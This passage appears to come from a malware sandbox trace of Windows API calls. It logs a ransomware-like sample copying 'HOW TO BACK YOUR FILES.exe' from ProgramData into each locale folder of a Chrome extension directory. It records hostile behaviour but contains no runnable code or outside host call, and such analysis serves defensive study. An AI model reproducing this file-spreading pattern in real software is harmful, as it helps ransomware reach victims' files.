Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.916] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.916] GetLastError () returned 0x0 [0104.916] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.916] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.916] CloseHandle (hObject=0x120) returned 1 [0104.917] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.917] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6da12e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6da12e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.917] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.917] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.917] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro" [0104.917] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro" [0104.917] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.917] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.918] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.918] GetLastError () returned 0x0 [0104.918] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.918] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.918] CloseHandle (hObject=0x120) returned 1 [0104.918] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.919] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6da38f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6da38f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.919] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.919] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.919] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT" [0104.919] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.919] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.920] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.920] GetLastError () returned 0x0 [0104.920] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.920] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.920] CloseHandle (hObject=0x120) returned 1 [0104.920] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.920] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6da38f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6da38f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.921] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.921] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.921] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR" [0104.921] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.921] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.921] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.922] GetLastError () returned 0x0 [0104.922] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.922] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.922] CloseHandle (hObject=0x120) returned 1 [0104.922] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.922] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6da5f0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6da5f0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.922] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.922] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.922] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl" [0104.922] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.923] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.923] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.923] GetLastError () returned 0x0 [0104.923] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.923] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.924] CloseHandle (hObject=0x120) returned 1 [0104.924] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.924] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6da5f0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6da5f0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.924] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.924] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.924] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no" [0104.924] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.924] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.925] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.925] GetLastError () returned 0x0 [0104.925] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.925] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.925] CloseHandle (hObject=0x120) returned 1 [0104.925] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.925] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6da85220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6da85220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.926] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.926] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.926] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl" [0104.926] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.926] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.926] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.927] GetLastError () returned 0x0 [0104.927] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.927] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.927] CloseHandle (hObject=0x120) returned 1 [0104.927] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.927] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6da85220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6da85220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.927] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.927] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.927] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv" [0104.927] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.928] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.928] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.928] GetLastError () returned 0x0 [0104.928] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.928] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.929] CloseHandle (hObject=0x120) returned 1 [0104.929] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.929] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6daab380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6daab380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.929] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.929] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.929] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt" [0104.929] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.929] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.930] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 